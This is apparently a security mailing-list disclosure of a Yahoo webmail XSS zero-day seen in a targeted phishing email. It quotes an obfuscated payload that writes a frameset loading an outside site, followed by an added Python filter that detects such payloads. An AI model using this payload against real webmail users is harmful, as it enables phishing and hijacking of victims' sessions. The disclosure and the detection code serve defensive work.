Hi.

I just got a targeted phishing attack on one of my Yahoo email accounts; what's interesting is that the attack exploits a Yahoo! webmail 0day XSS vulnerability. I'm trying to contact Yahoo right now, but in the meantime I thought it would be good to provide some bits because of the seriousness of this.

When you browse a message on Yahoo! Webmail the XSS exploit creates a frameset and redirects to http://w00tynetwork.com/x/. It's interesting that the address bar in IE doesn't refresh to show the actual URL; you can only see the redirection to http://w00tynetwork.com/x/ on the IE status bar if you have it visible.

I don't know if this vulnerability is being exploited in the wild since it was a targeted attack; I'm sure about this because of the content of the message.

Here is an extract from the exploit so you can start building some signatures, filtering, etc.

-----------------------------------
(java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>'))
-----------------------------------

I will provide full details later when Yahoo! fixes the issue. If security vendors are interested in full details please ask for them at info>at<argeniss>.<com

Cesar.
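
An added example, not part of the original post: a minimal mail-filter check in Python that strips the `/**/` comment splitting seen in the extract (plus whitespace and HTML entities) before looking for script schemes and frame injection. The function and label names are hypothetical; the sample input is the extract quoted in the post.

```python
import html
import re

# Hypothetical names throughout; this is illustrative filter logic only.
COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)   # /**/ used to split keywords
IGNORED = re.compile(r"[\x00-\x20]+")           # whitespace and control chars
SCHEME = re.compile(r"(?:java|vb|live)script:", re.IGNORECASE)
FRAME_WRITE = re.compile(r"document\.write\(.{0,40}<frame", re.I | re.S)

# The extract quoted in the post, used here as the test input.
SAMPLE = ("(java/**/script:document.write('<frameset cols=100% rows=100% "
          "border=0 frameboarder=0framespacing=0><frame frameborder=0 "
          "src=http://w00tynetwork.com/x/></frameset>'))")


def normalize(body: str) -> str:
    """Remove layers a lenient parser ignores, repeating until stable."""
    prev, text = None, body
    while text != prev:              # obfuscation layers can be nested
        prev = text
        text = html.unescape(text)   # &#106;avascript: and similar
        text = COMMENT.sub("", text)
        text = IGNORED.sub("", text)
    return text


def scan(body: str) -> list[str]:
    """Return labels for suspicious constructs found in a message body."""
    findings = []
    norm = normalize(body)
    if SCHEME.search(norm):
        findings.append("script-scheme")
        # Only visible after normalization: a naive keyword filter missed it.
        if not SCHEME.search(body):
            findings.append("obfuscated-scheme")
    if FRAME_WRITE.search(norm):
        findings.append("frame-injection")
    return findings


if __name__ == "__main__":
    print(scan(SAMPLE))
```

Matching on the normalized text trades some false positives (for example the plain words "java script:" in a message) for coverage of split keywords, so a production filter would apply it to attribute and style values rather than to visible text.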